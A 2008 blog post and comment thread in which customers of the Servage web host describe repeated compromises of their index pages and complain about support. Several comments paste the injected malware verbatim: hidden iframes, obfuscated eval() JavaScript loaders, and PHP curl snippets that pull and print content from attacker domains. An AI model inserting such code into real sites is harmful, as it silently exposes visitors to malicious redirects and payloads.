Servage hacked: Exploit-Iframe (Trojan) Infection
Hacks, PHP, WordpressI found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage’s servers but they denied it. They also said no one else reported this which i dont believe its true. The infection code is this :
<code><iframe src=”http://fredkidns.com/check/upd.php?t=562″ border=”0″ height=”0″ width=”0″></iframe></code>
<code><iframe src=”http://bestinlive.cn/i/index.php” border=”0″ height=”0″ width=”0″>
</iframe><script>eval(unescape(”%77%69%6e%64%6f%77%2e%73%
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code>
note: the line is so long that i had to insert line breaks
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.
I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.
Related posts
Friday, March 7th, 2008 at 1:56 pm and is filed under Hacks, PHP, Wordpress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
I have also experienced the exact same thing with pretty much all my websites on Servage.net.
so it must be true, although i asked and they said no about this beeing a general problem or at least a problem that affected other clients. In my opinion someone hacked their server and they are shamed to tell us about it
See my ongoing saga with Servage:
http://www.puppylinux.com/blog/
LOL, I reported a similar hack, right at the same time, with them also denying it was serverwide. I don’t run scripts that could cause this. All is secure on my domains. I tripple checked for that, so yeah, pretty sure they’re lying.
Solution: chmod all the indexes 444, for the time being anyway.. Of course, if you need to change it, make it 644 again.
Many of my indexes are static anyway.
I thought it was just me! I’m with Servage and they are such liars! I’ve had “viagra” hack three times now; the most recent today. Each time I’ve contacted them they suggested that I was only person and gave me the standard reply: “change password, check permissions, upgrade third party scripts”. Something needs to be done about these cowboys, and I don’t mean the hackers!
Yesterday, I had the same issue with Servage. When i asked about the logs, i got this stupid answer:
“Due to the clustered structure of our systems there is no single log file for you to use as your site is served by many servers. ”
Retards…
My Servage sites were also hacked, with malicious code inserted into every login/index/home page. VERY ANNOYING. This happened on March 23! Every site had bad code creating my-page-de.info cookies.
My Wordpress install have been injected with viagra links about ten times now.
I have tried everything, from changing codes, file permissions to installing a clean DB and all the files from the most recent WP.
Nothing helps so I’m also positive that the security on their side is the problem.
They don’t keep logs, or they wont let me see through it at least.
Their most useful reply is “it’s very hard to tell you what caused the issue”.
I’m sure it most be hard for them.
My Wordpress 2.3.3 was hacked as well. Supposedly there aren’t any known exploits for 2.3.3 but who knows. I also had an Aardvark Topsites Script site hacked and 4 mybb sites. ALL sites are pretty much updated to latest version. Somehow hackers injected malicious code onto about 6 sites. Luckily I really pay attention to my sites (have 150) and noticed the address bar doing a redirect it shouldn’t.
I really do wonder if Servage has a problem with being hacked across accounts.
I went ahead and changed all my passwords just the same.
Well as i wrote in that article regarding the change of hosting company, things are a bit better over at hostgator, i dont have hacking or site loading issues, but some uptime issues do exist. And I’m guesssing there is no shared hosting environment that is gonna solve all of these problems. If you want to leave all problems behind the only solution its a dedicated server, which I’m gonna buy in a few months, if my websites continue to expand.
25/04/2007 all my index en servage was infected i dont know how and i hope that dony happen again
as we can all see, from the date i first wrote about servage being hacked, people are still coming and commenting here about their problems with servage, This can only mean one thing, Servage still has problems and gets hacked probably every day
you just don’t know it yet.
it s the seconde time that all my page have been hacked by a spyware in servage
the second time ( 02/05/2008) with that
if (extension_loaded(”curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://100500.muchcool.info/inc.php?1767″);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(”",file(”http://100500.muchcool.info/inc.php?1767″)); }
if($r) print $r;
Had the same thing happen to my site recently. In fact, the malicious code replaced my entire home page, which didn’t load at all. I wiped all of the index pages and re-uploaded my local copies, only to have the same thing happen two days later.
Not sure what the server company is, as the webspace is through a friend…but judging from what people have said above, my guess is that it’s Servage.
Someone mentioned doing a chmod on all of the indexes to 444…how is this done, and what does it mean?
I’m desperate for a solution. Cheers.
doing a chmod wont solve your problem because of its nature, its just their server getting hacked, so the malicious code is inserted locally, there’s nothing you can do except change the hosting company
If however you wish to chmod your files this is done trough a FTP application like Filezilla for example which is free, you connect with your FTP username and password, next you right click on the folder you wish to Chmod and select file permissions, now if you wish this to be done Recursive(this means all the subfolders and the files inside will also be chmoded to that value)you should check that box too.
Hope this helps.
Thanks for the prompt response Proxy. I’ll have to check in with my friend who owns the webspace and see if we can switch servers.
Best,
- ET
Hmm…as it turns out, my site isn’t on Servage. It’s on Dreamhost. Why the same problem, then? Could this by a spyware/virus issue on my machine?
i doubt that, but if this is not servage there is a possibility that file permissions allowed an attacker to exploit remotely some vulnerability.
Updated permissions to 444 as recommended, but site does not load…understandably. Reverted to previous permissions (755). Any other recommendations?
…actually, scratch that. Updated permissions to 444 and site functions fine.
it should be ok from now on, but you will have some problems with pages that require write permission.
ALL my index.php over several accounts on Servage were hacked with the code mentioned earlier. I had all my index.php set to 444 because this has happened before to me on Servage. However, the hack changes the permissions to 644 BEFORE injecting the code so changing the permissions won’t do any good at all I’m afraid. The blame lies with Servage who basically lie to me every time I have a technical issue trying to pass the buck to me. Their sql servers are painfully slow and their technical support is pitiful. I wish I’d never heard of them and will be getting out as soon as I can. Waste of space.
i did not know the hack changes the permission prior to injection, but thats possible because its run locally on the machines. It’s true, Servage its a waste of time and money.
Just a reminder to folks that I experienced this same issue through Dreamhost…it’s not just native to Servage.
n the last Days I had exact the same problems and delete the code
allways manual from the Index Sites because there is not a real Help
from Servage.
I hold some Accounts by Servage and on all was the same problem.
On one Account I have now a massive Attack which generate near
200 GB Traffic in 2 Hours. The Problem have start yesterday and I
connect Servage via Ticket but all what they is to Suspend my Account
and give Standard answers without help.
In the Morning my Account go back Online and within 2 Hours I have the
same traffic. I wrote again to Servage and ask them about help but now
they did not longer answer me on any Support Ticket. The only what they
do is to suspend my Account again.
So if you Host by Servage and you have a Problem you will find no help.
They push all Problems to you and make nothing.
See below the Support Ticket with open end. I know that I wrote there
some mistakes about that I was angry. So dont look about this.
If I will get anymore answer from them I will post to but I think they
have no Interest to Help.
Here is the Ticket:
May 26 - 06:53 GMT
Customer
Hello,
you have suspend our Account about Bandwith Limit exceeded.
Why you did not inform us if there is any Problem ?
We did not receive any E-Mail or Warning from you.
Also we check the stats and we see that there was not
real some uniques and hits today. See below.
So please can you declare us whats happend.
Stats:
Today 561 3468 10853 215.51 GB
—————————————————————-
May 26 - 06:55 GMT
Servage
Hello xxxxx
Thank you for submitting the ticket.
All Servage accounts are allowed to use 167 GB of transfer per day. If you site goes over this limit it will be taken offline until the next day.
The 167 GB transfer limit per day which means that your traffic allowance will vary a bit from month to month. E.g. you will be allowed to use 5177 GB transfer in a 31 day month but only 4676 GB in a month of 28 days.
Thank you for your understanding,
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 - 06:57 GMT
Customer
Thank you for your standard answer but you did not give us any answer about our Question.
Is this the Kind of Service which Servage have ?
So please answer us about our Questions.
Why you did not inform us ?
How we can have this traffic if there are not
real some Visitors on the site ?
Is there any attack to our Account ?
—————————————————————-
May 26 - 07:38 GMT
Servage
Hello xxxx
Thank you for updating the ticket.
Can you please let us know where you wish to redirect your domain so that we can assist you in better manner.
We are sorry to inform that we do not give any notification regarding the4 bandwidth limit exceeded.
We can recommend to enable hotlinking protection.
You are able to prevent hot-linking from your web sites via the control panel. Please enable the “Hotlink Protection:” via this link:
https://xxxx.xxxx.net
Here is definition of how we count hits:
Each time a Web server sends a file to a browser, it is recorded in the server log file as a “hit”. Hits are generated for every element of a requested page (including graphics, text and interactive terms). If a page containing two graphics is viewed by a user, three hits will be recorded - one for the page itself and one for each graphic. Only one page view will be recorded.
I hope this helps )
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 - 07:57 GMT
Customer
We are not sure at the Moment if we like to redirect for the suspending time the Domain. We will clear it.
You wrote about hotlinking but the subdomain where there traffic come from is a via htaccess closed Member Area. There is no hotlinking possible. We have Ground to think that someone attack the Server.
We have see that yesterday a html Site was hacked. We have delete
this file and install it new.
In the last days the Traffic go high but without real uniques and hits. So for us it look that there work a Hacking script or some similar but we have without your help no one chance to do something about this and to protect the Site.
Also for secure we have change yesterday all Passwords.
Please check with your Admin your Logs if there is a special Traffic from one IP or a DDos Attack.
We have block over Htaccess the most critical IP´s but we dont now
from which Point come this undefined Traffic
—————————————————————-
May 26 - 09:28 GMT
Servage
Hello xxxx
You can take necessary actions for it. The subdomain indeed has taken a lot of bandwidth today.
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 - 13:04 GMT
Customer
Without Help from your site I have no chance to do anything.
Only you can check the Logs if there is a real attack and
find out from which Site it come. I did not have any posibilitiy
to find it out. All what I can do to take care of bad attacks
I have do. This is to see in the htaccess of the Subdomain.
Normal you must have byself a Interest to find out if there
is any Attack and also it must be a big Interest from you
to stand on the side of Client and to help where ever you can.
But as It look in your Answer you dont like to do exact this.
So if you are doing nothing from your Side to solve the Problem
then tell us which Chance we have.
Thats not a great Cooperation.
—————————————————————-
May 27 - 00:06 GMT
Customer
When the Account will be open again ?
—————————————————————-
May 27 - 01:12 GMT
Customer
The Account is allways down. It will be great if you tell me when he will be online again.
—————————————————————-
May 27 - 02:21 GMT
Servage
Hello xxxx
When a account is suspended for exceeding the bandwidth usage limits, it will be unsuspended the next day at 1.00 GMT.
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 27 - 03:41 GMT
Customer
We are again under attack. When you like to help us ? We have closed the Site http://xxxxx.org because there is the Attack
—————————————————————- Here they Suspend the Account without any Answer until now
May 27 - 03:48 GMT
Customer
Transfer: Domain:
0.01 GB xxxx.org
0.01 GB xxxx.org
190.19 GB xxxx.org
0.83 GB xxxx.org
—————————————————————-
May 27 - 03:51 GMT
Customer
We have rename the root folder of this subdomain so that there will be show no only the message “file not found”
—————————————————————-
May 27 - 04:38 GMT
Customer
This what you do is impossible. 2 Days we try now to get help from you about a Hacker attack (ddos) but all what you do is to suspend our Account. We have no access to the Logfiles to block this Attack
This can be come only from your Site but you did not do anything.
I have again had a VERY long exchange between myself and Servage regarding Microsoft Exchange and pop3. Basically, after a week of going backwards and forwards they are unprepared to assist either because they can’t due to incompetent staff or they won’t due to incompetent in-house policies. I have decided to move away from this abysmal company at the earliest possible opportunity. Does anyone have any opinions regarding HostGator?
I know this topic has developed away from the original post but it is related to Servage and their AWFUL service so I thought it would be ok to post here. If not… sorry and could a mod move it to a more appropriate place and let me know where. Thanks.
Alan Myers the best thing you can do is to leave them, i am with Servage for almost 3 months and I’m happy with their services. They are not perfect, they have some downtimes, but they are short,rare and unpredictable. For example i had a downtime today for about 1 hour, but its been like 2 months since i last had a similar downtime. It appears that the server where I’m hosted got attacked and they had to close down the interface to limit the damage. Apart from this i had no other problem with them. In fact you might not see this kind of issues ever, it depends on your luck and the server where you’ll get hosted. Bottom line, I’m stickin with Hostgator for the moment.
I am also having problems with servage, I have had all the above problems also I found changing permissions to 444 does nothing, some of my sites do not even have any scripts running at all, I have been getting this added to my index.html pages every couple of days, I am so sick of this company
[...] 7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection [...]
Servage — what a bunch of crooks and thieves. these sorry lazy apathetic incompetent f****! servage does not give a shit about their customers.
whatever started going to hell and downhill began at the beginning of the 2008 year for me. Is that when they sold it ? I don’t know but today is at least the 6th time my sites have been hacked
and it is the final time because I am moving all my sites and i hope they go down in flames those sorry f*****g assholes. THEY are pure crapola.
warning AVOID SERVAGE!
DO NOT USE SERVAGE.NET unless you want to be hacked every month and treated like shit.
When it first happened i thought it only happened to me but it seems that everybody suffered from their lack of efficiency.
Today I found next addition code on my page
It’s generate a lot of links on my index
My index file permission - 444. How it can be that sombody change my file?
Sorry I do not see the code I wrote. I wrote additional code on me index page again
if (extension_loaded(”curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://google-analitycs.net/AdWords/urchin_prz0.dat”);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(”",file(”http://google-analitycs.net/AdWords/urchin_prz0.dat”)); }
if($r) print $r;
these things get inserted locally into every index file
. It’s plain simple, Servage get’s hacked, and than your website has to suffer.
My sites were hacked again today too, they inserted a functions.js which contained this
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’d.f(”");’,16,16,’|iframe|in|cgi|cn||orentraff|src|http|width|display|none|style|document|height|write’.split(’|'),0,{}))
then a script in my pages with this in it
also another page had
eval(unescape(”%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%3
I’m so sick of this and servage never admits to anything
I have exact the same Problem and allways again I found this functions.js.
The best is the Reaction from Servage after I ask them about Advice.They answer:
You have to hold your Scripts and Sites clean of any Infection or we must suspend your Account.
Thats real a Joke !
they must think we’re all stupid
I have now moved over 50 websites away from these people. I now only have one website hosted with them which will be moved by the end of the week. I have never experienced service as pathetic as this ever. Everything about it is a joke. I will never go back to these people again and if anyone asks me my opinion I will say AVOID AT ALL COSTS.
Their servers are constantly being hacked which they deny and blame the end user for. Their clusters do not appear to be set up efficiently which means big delays when using the MySQL servers. CONSTANT timeouts from the MySQL servers, HUGE security issues - I would NEVER store card details with them again - and the worst thing about it all the staff. The technical support is a complete waste of time. You may as well spend your time constructively and use it to find a new host rather than to try any kind of interaction with these clowns.
They have NEVER answer the question/ query satisfactorily for me and end their pathetic attempts at technical support with stupid little smileys which serve only to piss people off even more.
I am amazed that someone has not complained officially to Trading Standards or some other regulatory body because the product they sold me was definately not ‘fit for purpose’. I can’t believe they’re still trading and that people are stupid enough to actually choose them as hosts anymore. The only positive reviews these people get appear to be planted by their own employees. The web is full of bad reviews about their service.
Me, I’ve voted with my feet and invested in an account with a reputable webhost. Servage can take their ‘award winning service’ and 96% customer satisfaction survey and shove it where the sun doesn’t shine.
Strong opinions about these people… Me? No I’m just reacting to the abysmal service these people provided me with. I COMPLETELY wasted my money with them.
Alan, I accept your comment complete.
Ißm very tired from this Company too but is it possible
that you tell us which alternative you use now ?
I now use Hostgator with no problems whatsoever. I use the baby croc option. Tech support has been superb up to now.
I’m using Hostgator too, with no problems. I recommend it
my question is where do you go if you have adult or gambling content and affiliate sites that are legal in europe or other countries but subject to prosecution in the usa?
you can’t use hostgator or us hosting for those sites. so where else other than servage? esp. since they hate and lie to their customers and their sites are hacked every other day.
thanks
so far i have no experience with other EU hosting..
I asked HostGator re: adult sites. They relplied that this is fine as long as the content is not illegal and there are warnings stating that it is adult orientated.
I also host a ‘lottery’ style site with them and this is fine too as long as the people playing agree to the t&c etc and declare they are of legal age in the country they are playing from.
I would ask HostGator the questions directly as I think you may find they are OK with adult and gambling sites as long as no law is being broken.
I have also some some adult and non adult Sites.
To test I have join now nakedhosting for my Adult Sites.
I will move one Site to them and test them Hosting.
Did anybody have work with them before ?
Frank, can you show me one of your adult websites ? maybe the most profitable..
And Alan, same question to you, can you show me your lottery style website ? post the link here if yes.
The website is in beta form at the moment and the client is busy testing the functionality so I cannot post it yet. We are looking at an end of August launch date.
ProXy connect me over Skype agc.ltd
Alan, okay
Frank i don’t use skype, only yahoo messenger so if you have an yahoo id or MSN we can connect.
SERVAGE.NET down/hacked for a third day today ! Try log in to CP Panel or sign-up, or anything ! Worst Security I have ever seen. Star away from SERVAGE.
I’m using Servage since 3 years.
At the beginning it was unreal, wonderful, fast, huge hosting.
With time things changed.
MySQL errors, email not sent or not received, but above all CONSTANT ATTACK BY HACKERS.
I showed them everything I found about those hackers (how they get information about root paths, what kind of holes on Servage servers they talk about on hackers forums…), but still they accuse my scripts to be unsafe.
I don’t understand what a policy they are using, as soon as it will be spread on the internet that Servage is unsafe hosting they will have no more customers, so why they are not investing time andresources to increase security?
I’m out of words, I will soon move to another host, though I’ve paid renewal just a few weeks ago.
Even though you just paid renewal you should ask for a refund.
My sites were hacked again today on servage, I’m sick of this shit, I’ve even got the permissions set 444 so how can they write to them?
I’m guessing the writing is done locally so the permissions are useless.
if anyone knows of a non-USA hosting service they recommend now that servage has proven they hate despise and LIE LIKE DOGS to their own customers every minute of every day — can you please post where you are finding hosting to replace the shittiest of shitty hosting (servage.net) - -which went to complete dog crap when they were bought by a USA company based in TX as far as I can tell, I might add.
about hostgator: they might be fine but they have not control over whether some moralistic prosecutor in some podunk town (like in florida) decides to FILE CRIMINAL CHARGES if they don’t like what’s on your site whether it’s legal or not based purely on their puritanical ‘local obscenity standards’ - or if you have gambling sites too - it has and is happening in the US. I won’t use hostgator for those sites even tho they are legal sites — can’t afford to take the chance.
my website with a traffic of 10000 has been infected google has blocked my website http://www.neeshu.com it is hosted on servage. I dont know what to do now I have put the site offline
the thing with the virus happened to me too, and I’m sure it also happened to many other but not everybody notices it. I was alerted by a reader of my website, who saw an alert on his av software.
The same was by me. What did you think how Servage has help me ?
You dont know ?
They suspend my Account with the comment that I have not take anything about secure and it is a high risk for other User. For this I have no one words. The only possitive is that I have Join another Hoster for some time and I have tranfer all my files before.There was only a smal part on Servage which I setup now by the new Hoster. I have stay many Years by Servage and in the beginning they have a great Support but whats going on now is not longer acceptable.
i couldn’t agree more, the facts speak for themselves.
Maybe we should start a class action lawsuit and sue these pricks for loss of earnings, after the last attack my sites have now been marked in google as This site may harm your computer. and I have lost all my #1 spots in google
I just emailed this to servage, I will post the response when I get one
Can you please pass this link along to someone high up in your company? http://www.google.com.au/search?hl=en&q=servage+hacked&start=0&sa=N
My sites are being hacked weekly now even static html pages with the permissions set to 444, maybe if somebody high up in management might stop blamming everyone else and update your security I would consider staying with your company, I am looking for a new host at the moment, that will actually look after there customers and patch there security so they are not hacked weekly.
Please dont email me saying to change my passwords and update my scripts, your servers are being hacked not our accounts fix it and read the complaints in google
this is really sad
but the biggest problem is that seems no one is able to find a good alternative host
it’s almost 2 weeks that my website is safe, but mysql downtimes are becoming more and more annoying
Rebel, i can’t wait to see their answer, don’t forget to post it here.
wonderer: hostgator is relatively good hosting, it only depends on what are your needs.
i’ve heard good and bad about hostgator, but the real problem is that it’s not european host
Hey ProXy, this the response I got from servage,Which I never reponded too, I ended up signing up with hostgator and asked google to remove the warning page for my listings which they did, I have a heap of #1 spots in google and no one could get to my sites, I was so pissed
Hello Rebel,
We are very sorry for the inconvience. May I ask if the problems only exist on a certain virtual host? Since when do you have this problem?
We do our best to improve the security of our system and actually we’re planning to implement a new selfmade cluster software, which will improve the security a lot!
Kind Regards
Manuel, Support
Servage Hosting
P.S Servage can kiss my Aussie arse!!!
I’ve left them even though my account does not run out until the end of January. I too am with HostGator. Not perfect by any means but INFINITELY better than those clowns at Servage. I have left one file on there - a blank index.php - too see if it gets infected. Although this is only 10bytes in size Servage say I am using 3.5GB of space. I have nothing in there anymore. No databases, e-mail accounts, cron jobs. Just 1 little index.php file. Servages response when I asked why bandswidth useage was rising and 3.5gb disk space showing as used….
“Hello Alan,
We can offer to move your account to our newest cluster if you would like that for solving the issue. If yes, kindly advice us by updating this ticket.
Please note your web site may be inaccessible up to 24 hours after the move. Please confirm that you want your account moved. We are looking forward hearing from you :o)
Kind Regards
Steven, Support
Servage Hosting
”
They deserve to be hacked and go out of business. They are selling product not fit for purpose. At least that’s what they did to me and every time I asked for things to be put right I got the same blockhead answers and nothing ever got done. So, I’ve moved now and good riddance to Servage.
@Rebel, their response is lame as usual, it drives you crazy when you see those reply’s
@Alan, same problem, lame reply’s that don’t offer valid solutions to our problems. The gig with “moving you to another cluster” is so old… and the change wont do anything good.
Today I found addons on my index pages.
I had all my index.php set to 444 because this has happened before to me on Servage.
Data of changes 10.10.2008
Please check all your index files
_script src=”http://www.google-analitic.com/urchin.js” type=”text/javascript”></script_
Wow!
I’m surprised at how many people have issues with Servage.net.
I’m with Servage and I’m now thinking of moving all my sites.
In the past 2 weeks, 2 sites have been compromised with the google-analitic.com malware. One php dating site and another with static html pages.
They denied responsibility and just suggested I change my permissions and reinstall all my software. Fantastic…NOT!
Since beginning 2008, I have noticed a decline in their customer service.
Time for a host change.